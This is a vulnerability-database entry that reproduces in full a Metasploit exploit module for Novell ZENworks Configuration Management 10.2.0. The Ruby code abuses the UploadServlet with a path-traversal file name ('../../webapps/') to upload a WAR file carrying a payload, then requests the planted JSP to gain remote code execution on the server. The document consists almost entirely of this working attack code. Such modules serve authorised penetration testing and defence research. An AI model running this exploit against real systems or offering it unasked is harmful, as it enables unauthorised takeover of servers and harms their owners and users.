Novell ZENworks Configuration Management Remote Execution

🗓️ 01 Jul 2014 00:00:00Reported by RootType

Novell ZENworks Configuration Management Remote Execution allows code execution by exploiting UploadServlet for malicious file upload and secondary request triggering


                                                ##
# $Id: zenworks_uploadservlet.rb 11099 2010-11-22 17:53:49Z egypt $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require &#39;msf/core&#39;

class Metasploit3 &#60; Msf::Exploit::Remote
	Rank = ExcellentRanking

	HttpFingerprint = { :pattern =&#62; [ /Apache-Coyote/ ] }

	include Msf::Exploit::Remote::HttpClient
	include Msf::Exploit::EXE

	def initialize(info = {})
		super(update_info(info,
			&#39;Name&#39;        =&#62; &#39;Novell ZENworks Configuration Management Remote Execution&#39;,
			&#39;Description&#39; =&#62; %q{
					This module exploits a code execution flaw in Novell ZENworks Configuration Management 10.2.0.
				By exploiting the UploadServlet, an attacker can upload a malicious file outside of the TEMP directory
				and then make a secondary request that allows for arbitrary code execution.
			},
			&#39;Author&#39;      =&#62; [ &#39;MC&#39; ],
			&#39;License&#39;     =&#62; MSF_LICENSE,
			&#39;Version&#39;     =&#62; &#39;$Revision: 11099 $&#39;,
			&#39;References&#39;  =&#62;
				[
					[ &#39;OSVDB&#39;, &#39;63412&#39; ],
					[ &#39;BID&#39;, &#39;39114&#39; ],
					[ &#39;URL&#39;, &#39;http://www.zerodayinitiative.com/advisories/ZDI-10-078/&#39; ],
					[ &#39;URL&#39;, &#39;http://tucanalamigo.blogspot.com/2010/04/pdc-de-zdi-10-078.html&#39; ],
				],
			&#39;Privileged&#39;  =&#62; true,
			&#39;Platform&#39;    =&#62; [ &#39;java&#39;, &#39;win&#39;, &#39;linux&#39; ],
			&#39;Targets&#39;     =&#62;
				[
					[ &#39;Java Universal&#39;,
						{
							&#39;Arch&#39; =&#62; ARCH_JAVA,
							&#39;Platform&#39; =&#62; &#39;java&#39;
						},
					],
					[ &#39;Windows x86&#39;,
						{
							&#39;Arch&#39; =&#62; ARCH_X86,
							&#39;Platform&#39; =&#62; &#39;win&#39;
						},
					],
					[ &#39;Linux x86&#39;, # should work but untested
						{
							&#39;Arch&#39; =&#62; ARCH_X86,
							&#39;Platform&#39; =&#62; &#39;linux&#39;
						},
					],
				],
			&#39;DefaultTarget&#39;  =&#62; 0,
			&#39;DisclosureDate&#39; =&#62; &#39;Mar 30 2010&#39;))

		register_options([Opt::RPORT(80),], self.class)
	end

	def exploit

		# Generate the WAR containing the EXE containing the payload
		app_base = rand_text_alphanumeric(4+rand(32-4))
		jsp_name = rand_text_alphanumeric(8+rand(8))

		war_data = payload.encoded_war(:app_name =&#62; app_base, :jsp_name =&#62; jsp_name).to_s

		res = send_request_cgi(
			{
				&#39;uri&#39;    =&#62; &#34;/zenworks/UploadServlet?filename=../../webapps/#{app_base}.war&#34;,
				&#39;method&#39; =&#62; &#39;POST&#39;,
				&#39;data&#39;   =&#62; war_data,
				&#39;headers&#39; =&#62;
					{
						&#39;Content-Type&#39; =&#62; &#39;application/octet-stream&#39;,
					}
			})

		print_status(&#34;Uploading #{war_data.length} bytes as #{app_base}.war ...&#34;)

		select(nil, nil, nil, 20)

		if (res.code == 200)
			print_status(&#34;Triggering payload at &#39;/#{app_base}/#{jsp_name}.jsp&#39; ...&#34;)
				send_request_raw(
					{
						&#39;uri&#39;    =&#62; &#34;/#{app_base}/&#34; + &#34;#{jsp_name}&#34; + &#39;.jsp&#39;,
						&#39;method&#39; =&#62; &#39;GET&#39;,
					})
		else
			print_error(&#34;Denied...&#34;)
		end

		handler
	end

end

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1